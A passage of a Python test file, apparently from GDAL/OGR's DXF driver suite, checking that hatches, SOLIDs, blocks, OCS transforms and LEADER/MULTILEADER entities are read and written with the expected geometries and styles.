1.8 0.0556692403840267,2.79902562010393 1.8 0.0279025894976503,2.8 1.8 3.6e-16)),' +
'((2.0 0.0 -4.8985871965894e-17,2.00097437989607 0.0 -0.0279025894976502,2.00389277250337 0.0 -0.0556692403840263,2.00874095970648 0.0 -0.0831646763271037,2.01549532162467 0.0 -0.1102549423268,2.02412295168564 0.0 -0.136808057330268,2.03458181694296 0.0 -0.16269465723032,2.04682096285643 0.0 -0.187788625114356,2.06078076153743 0.0 -0.211967705693282,2.07639320225002 0.0 -0.235114100916989,2.09358222275241 0.0 -0.257115043874616,2.11226407986454 0.0 -0.277863348183599,2.13234775745646 0.0 -0.297257930190958,2.15373540986974 0.0 -0.315204301442689,2.1763228386117 0.0 -0.331615029022017,2.2 0.0 -0.346410161513776,2.22465154128437 0.0 -0.359517618519667,2.25015736263363 0.0 -0.370873541826715,2.27639320225002 0.0 -0.380422606518061,2.30323124176013 0.0 -0.388118290510399,2.33054072893323 0.0 -0.393923101204883,2.35818861469294 0.0 -0.397808758147309,2.386040201319 0.0 -0.399756330807638,2.413959798681 0.0 -0.399756330807638,2.44181138530706 0.0 -0.397808758147309,2.46945927106677 0.0 -0.393923101204883,2.49676875823987 0.0 -0.388118290510399,2.52360679774998 0.0 -0.380422606518061,2.54984263736636 0.0 -0.370873541826715,2.57534845871563 0.0 -0.359517618519667,2.6 0.0 -0.346410161513775,2.6236771613883 0.0 -0.331615029022017,2.64626459013026 0.0 -0.315204301442689,2.66765224254354 0.0 -0.297257930190958,2.68773592013546 0.0 -0.277863348183599,2.70641777724759 0.0 -0.257115043874616,2.72360679774998 0.0 -0.235114100916989,2.73921923846257 -0.0 -0.211967705693282,2.75317903714357 -0.0 -0.187788625114356,2.76541818305704 -0.0 -0.16269465723032,2.77587704831436 -0.0 -0.136808057330267,2.78450467837533 -0.0 -0.1102549423268,2.79125904029352 -0.0 -0.0831646763271037,2.79610722749663 -0.0 -0.0556692403840262,2.79902562010393 -0.0 -0.0279025894976501,' +
'2.8 -0.0 1e-31,2.8 1.8 3.6e-16,2.79902562010393 1.8 -0.0279025894976498,2.79610722749663 1.8 -0.0556692403840258,2.79125904029352 1.8 -0.0831646763271034,2.78450467837533 1.8 -0.110254942326799,2.77587704831436 1.8 -0.136808057330267,2.76541818305704 1.8 -0.16269465723032,2.75317903714357 1.8 -0.187788625114356,2.73921923846257 1.8 -0.211967705693282,2.72360679774998 1.8 -0.235114100916989,2.70641777724759 1.8 -0.257115043874615,2.68773592013546 1.8 -0.277863348183599,2.66765224254354 1.8 -0.297257930190957,2.64626459013026 1.8 -0.315204301442689,2.6236771613883 1.8 -0.331615029022016,2.6 1.8 -0.346410161513775,2.57534845871563 1.8 -0.359517618519667,2.54984263736636 1.8 -0.370873541826715,2.52360679774998 1.8 -0.380422606518061,2.49676875823987 1.8 -0.388118290510398,2.46945927106677 1.8 -0.393923101204883,2.44181138530706 1.8 -0.397808758147309,2.413959798681 1.8 -0.399756330807638,2.386040201319 1.8 -0.399756330807638,2.35818861469294 1.8 -0.397808758147309,2.33054072893323 1.8 -0.393923101204883,2.30323124176013 1.8 -0.388118290510398,2.27639320225002 1.8 -0.380422606518061,2.25015736263363 1.8 -0.370873541826715,2.22465154128437 1.8 -0.359517618519666,2.2 1.8 -0.346410161513775,2.1763228386117 1.8 -0.331615029022016,2.15373540986974 1.8 -0.315204301442689,2.13234775745646 1.8 -0.297257930190957,2.11226407986454 1.8 -0.277863348183599,2.09358222275241 1.8 -0.257115043874615,2.07639320225002 1.8 -0.235114100916989,2.06078076153743 1.8 -0.211967705693282,2.04682096285643 1.8 -0.187788625114356,2.03458181694296 1.8 -0.16269465723032,2.02412295168564 1.8 -0.136808057330267,2.01549532162467 1.8 -0.1102549423268,2.00874095970648 1.8 -0.0831646763271034,2.00389277250337 1.8 -0.0556692403840259,2.00097437989607 1.8 -0.0279025894976499,2.0 1.8 3.11014128034106e-16,2.0 0.0 -4.8985871965894e-17)),' +
'((2.8 -0.0 1e-31,2.79902562010393 -0.0 0.0279025894976499,2.79610722749663 -0.0 0.0556692403840264,2.79125904029352 -0.0 0.0831646763271039,2.78450467837533 -0.0 0.1102549423268,2.77587704831436 -0.0 0.136808057330267,2.76541818305704 -0.0 0.16269465723032,2.75317903714357 -0.0 0.187788625114356,2.73921923846257 -0.0 0.211967705693282,2.72360679774998 -0.0 0.235114100916989,2.70641777724759 -0.0 0.257115043874616,2.68773592013546 -0.0 0.277863348183599,2.66765224254354 -0.0 0.297257930190958,2.64626459013026 -0.0 0.315204301442689,2.6236771613883 -0.0 0.331615029022017,2.6 -0.0 0.346410161513775,2.57534845871563 -0.0 0.359517618519667,2.54984263736636 -0.0 0.370873541826715,2.52360679774998 -0.0 0.380422606518061,2.49676875823987 -0.0 0.388118290510399,2.46945927106677 -0.0 0.393923101204883,2.44181138530706 -0.0 0.397808758147309,2.413959798681 -0.0 0.399756330807638,2.386040201319 -0.0 0.399756330807638,2.35818861469294 -0.0 0.397808758147309,2.33054072893323 -0.0 0.393923101204883,2.30323124176013 -0.0 0.388118290510399,2.27639320225002 -0.0 0.380422606518061,2.25015736263363 -0.0 0.370873541826715,2.22465154128437 -0.0 0.359517618519667,2.2 -0.0 0.346410161513775,2.1763228386117 -0.0 0.331615029022017,2.15373540986974 0.0 0.315204301442689,2.13234775745646 0.0 0.297257930190958,2.11226407986454 0.0 0.277863348183599,2.09358222275241 0.0 0.257115043874616,2.07639320225002 0.0 0.235114100916989,2.06078076153743 0.0 0.211967705693282,2.04682096285643 0.0 0.187788625114356,2.03458181694296 0.0 0.16269465723032,2.02412295168564 0.0 0.136808057330267,2.01549532162467 0.0 0.1102549423268,2.00874095970648 0.0 0.0831646763271036,2.00389277250337 0.0 0.0556692403840262,2.00097437989607 0.0 0.0279025894976499,' +
'2.0 0.0 -4.8985871965894e-17,2.0 1.8 3.11014128034106e-16,2.00097437989607 1.8 0.0279025894976503,2.00389277250337 1.8 0.0556692403840266,2.00874095970648 1.8 0.083164676327104,2.01549532162467 1.8 0.1102549423268,2.02412295168564 1.8 0.136808057330268,2.03458181694296 1.8 0.16269465723032,2.04682096285643 1.8 0.187788625114357,2.06078076153743 1.8 0.211967705693282,2.07639320225002 1.8 0.23511410091699,2.09358222275241 1.8 0.257115043874616,2.11226407986454 1.8 0.277863348183599,2.13234775745646 1.8 0.297257930190958,2.15373540986974 1.8 0.315204301442689,2.1763228386117 1.8 0.331615029022017,2.2 1.8 0.346410161513776,2.22465154128437 1.8 0.359517618519667,2.25015736263363 1.8 0.370873541826715,2.27639320225002 1.8 0.380422606518062,2.30323124176013 1.8 0.388118290510399,2.33054072893323 1.8 0.393923101204884,2.35818861469294 1.8 0.39780875814731,2.386040201319 1.8 0.399756330807639,2.413959798681 1.8 0.399756330807639,2.44181138530706 1.8 0.39780875814731,2.46945927106677 1.8 0.393923101204884,2.49676875823987 1.8 0.388118290510399,2.52360679774998 1.8 0.380422606518062,2.54984263736636 1.8 0.370873541826715,2.57534845871563 1.8 0.359517618519667,2.6 1.8 0.346410161513776,2.6236771613883 1.8 0.331615029022017,2.64626459013026 1.8 0.315204301442689,2.66765224254354 1.8 0.297257930190958,2.68773592013546 1.8 0.277863348183599,2.70641777724759 1.8 0.257115043874616,2.72360679774998 1.8 0.23511410091699,2.73921923846257 1.8 0.211967705693283,2.75317903714357 1.8 0.187788625114357,2.76541818305704 1.8 0.16269465723032,2.77587704831436 1.8 0.136808057330268,2.78450467837533 1.8 0.1102549423268,2.79125904029352 1.8 0.0831646763271043,2.79610722749663 1.8 0.0556692403840267,2.79902562010393 1.8 0.0279025894976503,2.8 1.8 3.6e-16,2.8 -0.0 1e-31)))' ):
gdaltest.post_reason( 'wrong geometry for cylinder' )
return 'fail'
return 'success'
###############################################################################
# Writing Triangle geometry and checking if it is written properly
def ogr_dxf_34():
ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/triangle_test.dxf' )
lyr = ds.CreateLayer( 'entities' )
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'TRIANGLE ((0 0,0 1,1 0,0 0))' ) )
lyr.CreateFeature( dst_feat )
dst_feat = None
lyr = None
ds = None
# Read back.
ds = ogr.Open('tmp/triangle_test.dxf')
lyr = ds.GetLayer(0)
# Check first feature
feat = lyr.GetNextFeature()
geom = feat.GetGeometryRef()
expected_wkt = 'POLYGON ((0 0,0 1,1 0,0 0))'
received_wkt = geom.ExportToWkt()
if expected_wkt != received_wkt:
gdaltest.post_reason( 'did not get expected geometry back: got %s' % received_wkt )
return 'fail'
ds = None
gdal.Unlink('tmp/triangle_test.dxf' )
return 'success'
###############################################################################
# Test reading hatch with elliptical harts
def ogr_dxf_35():
ds = ogr.Open('data/elliptical-arc-hatch-min.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
expected_wkt = "POLYGON Z ((10.0 5.0 0,10.0121275732481 0.823574944937595 0," + \
"10.0484514617793 -3.3325901498166 0," + \
"10.1087954573461 -7.44833360561541 0," + \
"10.1928668294578 -11.5036898303666 0," + \
"10.3002577454253 -15.478986172205 0," + \
"10.4304472487686 -19.3549383521031 0," + \
"10.5828037863926 -23.1127440124738 0," + \
"10.7565882722693 -26.7341739279578 0," + \
"10.950957672766 -30.2016604359299 0," + \
"11.164969096226 -33.4983826577451 0," + \
"11.3975843669637 -36.6083480973141 0," + \
"11.6476750614854 -39.5164702211696 0," + \
"11.9140279825044 -42.2086416436832 0," + \
"12.1953510441969 -44.6718025624057 0," + \
"12.4902795401481 -46.8940041115515 0," + \
"12.797382763583 -48.8644663262969 0," + \
"13.1151709477668 -50.5736304367052 0," + \
"13.442102492907 -52.0132052375995 0," + \
"13.7765914444993 -53.1762073094422 0," + \
"14.1170151868394 -54.0569948951078 0," + \
"14.4617223143788 -54.6512952682117 0," + \
"14.8090406427424 -54.9562254602315 0," + \
"15.1572853205429 -54.9703062458714 0," + \
"15.5047670026452 -54.6934693188278 0," + \
"15.8498000452284 -54.1270576231449 0," + \
"16.1907106828936 -53.2738188385539 0," + \
"16.5258451481492 -52.137892051398 0," + \
"16.853577693885 -50.7247876758036 0," + \
"17.1723184799194 -49.0413607224995 0," + \
"17.4805212853603 -47.0957775449594 0," + \
"17.7766910093686 -44.8974762241817 0," + \
"18.0593909239355 -42.457120784282 0," + \
"18.3272496434925 -39.7865494609998 0," + \
"18.578967777543 -36.8987172740701 0," + \
"18.8133242340436 -33.8076331820431 0," + \
"19.0291821429573 -30.5282921244156 0," + \
"19.2254943712436 -27.0766022807403 0," + \
"19.4013086025311 -23.4693078995808 0," + \
"19.5557719568327 -19.7239080716712 0," + \
"19.6881351278911 -15.8585718413141 0," + \
"19.7977560180852 -11.8920500678142 0," + \
"19.8841028532649 -7.84358446451107 0," + \
"19.9467567624029 -3.73281425666327 0," + \
"19.9854138095503 0.420319089008591 0," + \
"19.9998864682387 4.59566860096071 0," + \
"19.9901045311767 8.77297953637629 0," + \
"19.9561154508277 12.9319876375154 0," + \
"19.8980841092162 17.0525174342237 0," + \
"19.8162920180808 21.1145801157289 0," + \
"19.7111359532519 25.0984704969476 0," + \
"19.5831260298811 28.9848626089156 0," + \
"19.4328832278572 32.7549034496293 0," + \
"19.2611363794148 36.390304440511 0," + \
"19.0687186335478 39.8734301448397 0," + \
"18.856563414379 43.1873838177704 0," + \
"18.6256998930927 46.3160893729396 0," + \
"18.3772479953948 49.2443693680303 0," + \
"18.1124129687203 51.9580186309899 0," + \
"17.8324795355432 54.4438731697361 0," + \
"17.5388056611497 56.6898740310677 0," + \
"17.2328159661089 58.6851257990001 0," + \
"16.9159948153966 60.4199494487478 0," + \
"16.5898791176976 61.8859292999569 0," + \
"16.2560508698165 63.075953841417 0," + \
"15.9161294823645 63.9842502292107 0," + \
"15.5717639239516 64.6064122909483 0," + \
"15.2246247219914 64.9394219002396 0," + \
"14.8763958589235 64.9816636177129 0," + \
"14.5287666031655 64.7329325275591 0," + \
"14.1834233144223 64.1944352315841 0," + \
"13.8420412631059 63.3687839959484 0," + \
"13.5062765035495 62.2599840789869 0," + \
"13.1777578404393 60.8734143015838 0," + \
"12.8580789274355 59.2158009543548 0," + \
"12.5487905363114 57.2951851682141 0," + \
"12.2513930341143 55.1208839066128 0," + \
"11.9673291048407 52.7034447686764 0," + \
"11.6979767509346 50.0545948224921 0," + \
"11.4446426085565 47.1871837167582 0," + \
"11.2085556090535 44.1151213467616 0," + \
"10.9908610173775 40.8533103770683 0," + \
"10.792614876371 37.4175739482608 0," + \
"10.6147788838724 33.8245789184198 0," + \
"10.4582157274918 30.0917550117071 0," + \
"10.323684899688 26.2372102662631 0," + \
"10.2118390134483 22.2796431915832 0," + \
"10.1232206364439 18.2382520615003 0," + \
"10.0582596590181 14.1326417827963 0," + \
"10.0172712087756 9.98272879122447 0," + \
"10.0172712087756 9.9827287912244 0," + \
"13.3027626235603 8.26630944469236 0," + \
"10.0 5.0 0," + \
"10.0 5.0 0))"""
if ogrtest.check_feature_geometry(feat, expected_wkt) != 0:
return 'fail'
return 'success'
###############################################################################
# Test reading files with only INSERT content (#7006)
def ogr_dxf_36():
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
ds = ogr.Open('data/insert_only.dxf')
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)
lyr = ds.GetLayer(0)
if lyr.GetFeatureCount() != 5:
return 'fail'
return 'success'
###############################################################################
# Create a blocks layer only
def ogr_dxf_37():
ds = ogr.GetDriverByName('DXF').CreateDataSource('/vsimem/ogr_dxf_37.dxf')
lyr = ds.CreateLayer( 'blocks' )
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT (1 2)' ) )
lyr.CreateFeature( dst_feat )
dst_feat = None
lyr = None
ds = None
# Read back.
gdal.SetConfigOption('DXF_INLINE_BLOCKS', 'FALSE')
ds = ogr.Open('/vsimem/ogr_dxf_37.dxf')
gdal.SetConfigOption('DXF_INLINE_BLOCKS', None)
lyr = ds.GetLayerByName('blocks')
# Check first feature
feat = lyr.GetNextFeature()
if feat is None:
return 'fail'
ds = None
gdal.Unlink( '/vsimem/ogr_dxf_37.dxf')
return 'success'
###############################################################################
# Test degenerated cases of SOLID (#7038)
def ogr_dxf_38():
ds = ogr.Open('data/solid-less-than-4-vertices.dxf')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f.GetGeometryRef().ExportToWkt() != 'POINT (0 2)' \
or f.GetStyleString() != 'PEN(c:#000000)':
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetGeometryRef().ExportToWkt() != 'LINESTRING (0.5 2.0,1 2)' \
or f.GetStyleString() != 'PEN(c:#000000)':
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test correct reordering of vertices in SOLID (#7038, #7089)
def ogr_dxf_39():
ds = ogr.Open('data/solid-vertex-ordering.dxf')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f.GetGeometryRef().ExportToWkt() != 'POLYGON ((0 5,1.5 2.5,1.5 0.0,0.0 2.5,0 5))':
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetGeometryRef().ExportToIsoWkt() != 'POLYGON Z ((-10 13 123,10 10 123,5 12 123,8 13 123,-10 13 123))':
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test handing of OCS vs WCS for MTEXT (#7049)
def ogr_dxf_40():
ds = ogr.Open('data/mtext-ocs-reduced.dxf')
lyr = ds.GetLayer(0)
f = lyr.GetFeature(5)
if ogrtest.check_feature_geometry(f, 'POINT (320000.0 5815007.5 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test handing of OCS vs WCS for SOLID, HATCH and INSERT (#7077, #7098)
def ogr_dxf_41():
ds = ogr.Open('data/ocs2wcs3.dxf')
lyr = ds.GetLayer(0)
# INSERT #1: OCS normal vector (0,0,-1)
f = lyr.GetFeature(1)
if ogrtest.check_feature_geometry(f, 'LINESTRING (45 20,25 20,25 40,45 40,45 20)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# INSERT #2: OCS normal vector (0,1/sqrt(2),-1/sqrt(2))
f = lyr.GetFeature(3)
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (10.0 18.0 -76.3675323681472,-10.0 18.0 -76.3675323681472,-10.0 32.142135623731 -62.2253967444162,10.0 32.142135623731 -62.2253967444162,10.0 18.0 -76.3675323681472)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# INSERT #3: OCS normal vector (0.6,sqrt(8)/5,sqrt(8)/5) with
# Y scale factor of 2 and rotation angle of 45 degrees
f = lyr.GetFeature(5)
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (49.7198871869889 -21.8420670839387 75.1721817670195,34.1976071850546 -17.0401066991021 86.8340855568821,41.9587471852111 -48.595846365317 110.157893136607,57.4810271871454 -53.3978067501536 98.4959893467447,49.7198871869889 -21.8420670839387 75.1721817670195)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# HATCH
f = lyr.GetFeature(7)
expected_wkt = "POLYGON Z ((-4.0 41.0121933088198 -132.936074863071," + \
"-4.40490904691695 41.0186412752948 -132.929626896596," + \
"-4.80797195119362 41.0379557758564 -132.910312396034," + \
"-5.20735098749398 41.0700487479548 -132.878219423936," + \
"-5.60122522671268 41.1147738668667 -132.833494305024," + \
"-5.98779883832069 41.1719272128483 -132.776340959042," + \
"-6.3653092782765 41.2412482008871 -132.707019971004," + \
"-6.73203532517085 41.3224207688135 -132.625847403077," + \
"-7.08630492796504 41.4150748183547 -132.533193353536," + \
"-7.42650282954181 41.5187879025613 -132.429480269329," + \
"-7.75107793130996 41.6330871519123 -132.315181019978," + \
"-8.05855036528454 41.7574514303164 -132.190816741574," + \
"-8.34751824139814 41.8913137111809 -132.05695446071," + \
"-8.61666403927964 42.0340636627126 -131.914204509178," + \
"-8.86476061535765 42.1850504306657 -131.763217741225," + \
"-9.09067679789991 42.3435856058464 -131.604682566044," + \
"-9.29338254447862 42.5089463628474 -131.439321809043," + \
"-9.47195363834675 42.6803787556975 -131.267889416193," + \
"-9.62557590231259 42.8571011554044 -131.091167016486," + \
"-9.75354891089994 43.0383078137139 -130.909960358177," + \
"-9.85528918386859 43.2231725368399 -130.725095635051," + \
"-9.9303328465346 43.4108524524121 -130.537415719479," + \
"-9.97833774476093 43.6004918524697 -130.347776319421," + \
"-9.99908500497526 43.7912260949768 -130.157042076914," + \
"-9.99248003210238 43.9821855460716 -129.966082625819," + \
"-9.95855294086101 44.1724995450765 -129.775768626814," + \
"-9.89745841845876 44.3613003741885 -129.586967797702," + \
"-9.80947501931113 44.5477272147525 -129.400540957138," + \
"-9.80947501928313 44.5477272147525 -129.400540957138," + \
"1.0 44.5477272147525 -129.400540957138," + \
"0.988343845952696 44.306453848479 -129.641814323412," + \
"0.953429730181654 44.0663054100155 -129.881962761875," + \
"0.895420438411614 43.828401582239 -130.119866589652," + \
"0.814586436738996 43.5938515826157 -130.354416589275," + \
"0.711304610594103 43.3637489915164 -130.584519180374," + \
"0.586056507527265 43.1391666534406 -130.80910151845," + \
"0.439426092011876 42.9211516749198 -131.027116496971," + \
"0.272097022732443 42.7107205424238 -131.237547629467," + \
"0.084849465052212 42.5088543830312 -131.43941378886," + \
"-0.1214435464779 42.3164943899624 -131.631773781928," + \
"-0.34582017860938 42.134537434302 -131.813730737589," + \
"-0.587234283906729 41.9638318833721 -131.984436288519," + \
"-0.844560278369735 41.8051736452522 -132.143094526639," + \
"-1.11659838942566 41.6593024578878 -132.288965714003," + \
"-1.40208024982283 41.5268984400915 -132.421369731799," + \
"-1.69967481134424 41.4085789205144 -132.539689251376," + \
"-2.00799455076879 41.3048955593753 -132.643372612515," + \
"-2.32560193914507 41.216331776366 -132.731936395525," + \
"-2.65101614421488 41.1433004967256 -132.804967675165," + \
"-2.98271993473683 41.0861422259924 -132.862125945898," + \
"-3.31916675451876 41.04512346241 -132.903144709481," + \
"-3.65878793317664 41.0204354543892 -132.927832717502," + \
"-4.0 41.0121933088198 -132.936074863071," + \
"-4.0 41.0121933088198 -132.936074863071))"
if ogrtest.check_feature_geometry(f, expected_wkt) != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# SOLID
f = lyr.GetFeature(9)
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((-10.0 13.0 124,8.0 13.0 124,5.0 12.0 123,10.0 10.0 121,-10.0 13.0 124))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test insertion of blocks within blocks (#7106)
def ogr_dxf_42():
# Inlining, merging
ds = ogr.Open('data/block-insert-order.dxf')
lyr = ds.GetLayer(0)
if lyr.GetFeatureCount() != 2:
gdaltest.post_reason( 'Defaults: Expected 2 features, found %d' % lyr.GetFeatureCount() )
return 'fail'
# No inlining, merging
gdal.SetConfigOption('DXF_INLINE_BLOCKS', 'FALSE')
ds = ogr.Open('data/block-insert-order.dxf')
gdal.SetConfigOption('DXF_INLINE_BLOCKS', None)
lyr = ds.GetLayerByName('entities')
if lyr.GetFeatureCount() != 2:
gdaltest.post_reason( 'No inlining: Expected 2 features on entities, found %d' % lyr.GetFeatureCount() )
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (8.0 2.5 6)') != 0:
gdaltest.post_reason( 'Wrong geometry for first insertion point' )
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (-1 -2 -3)') != 0:
gdaltest.post_reason( 'Wrong geometry for second insertion point' )
f.DumpReadable()
return 'fail'
lyr = ds.GetLayerByName('blocks')
if lyr.GetFeatureCount() != 6:
gdaltest.post_reason( 'No inlining: Expected 6 feature on blocks, found %d' % lyr.GetFeatureCount() )
return 'fail'
f = lyr.GetFeature(3)
if ogrtest.check_feature_geometry(f, 'POINT Z (5 5 0)') != 0:
gdaltest.post_reason( 'Wrong geometry for second insertion of BLOCK4 on BLOCK3' )
f.DumpReadable()
return 'fail'
f = lyr.GetFeature(4)
if ogrtest.check_feature_geometry(f, 'POINT Z (-5.48795472456028 1.69774937525433 4.12310562561766)') != 0:
gdaltest.post_reason( 'Wrong geometry for third insertion of BLOCK4 on BLOCK3' )
f.DumpReadable()
return 'fail'
if f.GetField('BlockName') != 'BLOCK4':
gdaltest.post_reason( 'Wrong BlockName' )
return 'fail'
if f.GetField('BlockScale') != [0.4,1.0,1.5]:
gdaltest.post_reason( 'Wrong BlockScale' )
return 'fail'
if f.GetField('BlockAngle') != 40:
gdaltest.post_reason( 'Wrong BlockAngle' )
return 'fail'
if f.GetField('BlockOCSNormal') != [0.6,0.565685424949238,0.565685424949238]:
gdaltest.post_reason( 'Wrong BlockOCSNormal' )
return 'fail'
if f.GetField('BlockOCSCoords') != [5,5,0]:
gdaltest.post_reason( 'Wrong BlockOCSCoords' )
return 'fail'
if f.GetField('Block') != 'BLOCK3':
gdaltest.post_reason( 'Wrong Block' )
return 'fail'
# Inlining, no merging
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
ds = ogr.Open('data/block-insert-order.dxf')
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)
lyr = ds.GetLayer(0)
if lyr.GetFeatureCount() != 4:
gdaltest.post_reason( 'Merging: Expected 4 features, found %d' % lyr.GetFeatureCount() )
return 'fail'
return 'success'
###############################################################################
# Ensure recursively-included blocks don't fail badly
def ogr_dxf_43():
ds = ogr.Open('data/insert-recursive-pair.dxf')
lyr = ds.GetLayer(0)
if lyr.GetFeatureCount() != 1:
return 'fail'
return 'success'
###############################################################################
# General tests of LEADER and MULTILEADER entities (#7111)
def ogr_dxf_44():
ds = ogr.Open('data/leader-mleader.dxf')
lyr = ds.GetLayer(0)
# LEADER with default arrowhead, plus a couple of DIMSTYLE overrides
# (6.0 arrowhead size and 1.5 scale factor)
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (21 40 0,10 40 0,19.3125 34.6875 0,10.3125 34.6875 0,-13.5990791268758 34.6875 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((21.0 41.5,30 40,21.0 38.5,21.0 41.5))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Skip text
f = lyr.GetNextFeature()
# Basic LEADER with no dimension style or override information
f = lyr.GetNextFeature()
if f.GetStyleString() != 'PEN(c:#ff0000)' \
or ogrtest.check_feature_geometry(f, 'LINESTRING Z (-20.9782552979609 38.1443878852919 30,-12.2152357926375 44.793971841437 30,-13.7256166009765 49.0748560186272 30,-13.9025293262723 49.0416613258524 30)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetStyleString() != 'BRUSH(fc:#ff0000)' \
or ogrtest.check_feature_geometry(f, 'POLYGON Z ((-20.9601206293303 38.1204894796201 30,-21.121645731992 38.035579873508 30,-20.9963899665916 38.1682862909638 30,-20.9601206293303 38.1204894796201 30))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# LEADER with a custom arrowhead that consists of a polygon and line
f = lyr.GetNextFeature()
if f.GetStyleString() != 'PEN(c:#00ff00)' \
or ogrtest.check_feature_geometry(f, 'LINESTRING Z (26.8 77.6 0,10 65 0,25 55 0,25 50 0,40 65 0,48 65 0,169.282571623465 65.0 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetStyleString() != 'BRUSH(fc:#00ff00)' \
or ogrtest.check_feature_geometry(f, 'POLYGON ((27.2 80.4,30.4 82.8,32.8 79.6,29.6 77.2,27.2 80.4))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetStyleString() != 'PEN(c:#00ff00)' \
or ogrtest.check_feature_geometry(f, 'LINESTRING Z (28.4 78.8 0,26.8 77.6 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Check that the very long text string in the MTEXT entity associated
# to this LEADER is captured correctly
f = lyr.GetNextFeature()
if len( f.GetField('Text') ) != 319:
gdaltest.post_reason( 'Wrong text length: got %d' % len( f.GetField('Text') ) )
return 'fail'
# MULTILEADER with custom arrowhead
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((26.8 32.6,10 20,25 10,25 5,40 20),(40 20,48 20))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((27.2 35.4,30.4 37.8,32.8 34.6,29.6 32.2,27.2 35.4))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (28.4 33.8 0,26.8 32.6 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT (50.0 22.0327421555252)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
if f.GetStyleString() != 'LABEL(f:"Arial",t:"Basic Multileader",p:7,s:4g,c:#000000)':
gdaltest.post_reason( 'Wrong style string on MULTILEADER text' )
f.DumpReadable()
return 'fail'
# There are three LEADERs, followed by two MULTILEADERs, without arrowheads.
# In the first LEADER/MULTILEADER, the arrowhead is set to an empty block.
# In the second LEADER/MULTILEADER, the arrowhead is too large to be displayed.
# The third LEADER has the arrow turned off (this isn't possible for MULTILEADER).
# We just check each of these to make sure there is no polygon (arrowhead) feature.
for x in range(3):
f = lyr.GetNextFeature()
geom = f.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbLineString25D:
gdaltest.post_reason( 'Unexpected LEADER geometry, expected wkbLineString25D on iteration %d' % x )
return 'fail'
for x in range(2):
f = lyr.GetNextFeature()
geom = f.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbMultiLineString:
gdaltest.post_reason( 'Unexpected MULTILEADER geometry, expected wkbMultiLineString on iteration %d' % x )
return 'fail'
f = lyr.GetNextFeature()
geom = f.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbPoint:
gdaltest.post_reason( 'Unexpected MULTILEADER geometry, expected wkbPoint on iteration %d' % x )
return 'fail'
# MULTILEADER with multiple leader lines and formatted text
f = lyr.GetNextFeature()
if f.GetStyleString() != 'PEN(c:#0000ff)' \
or ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((7.6425115795681 -8.00285406769102,18.2 -20.0),(19.2913880067389 -13.9367332958948,18.2 -20.0),(18.2 -20.0,38 -20),(54.8204921137545 -22.5800753657327,60.2227692307692 -20.0),(60.2227692307692 -20.0,52.2227692307692 -20.0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetStyleString() != 'BRUSH(fc:#0000ff)' \
or ogrtest.check_feature_geometry(f, 'POLYGON Z ((7.1420359016196 -8.4432726642857 0,5 -5 0,8.1429872575166 -7.56243547109634 0,7.1420359016196 -8.4432726642857 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
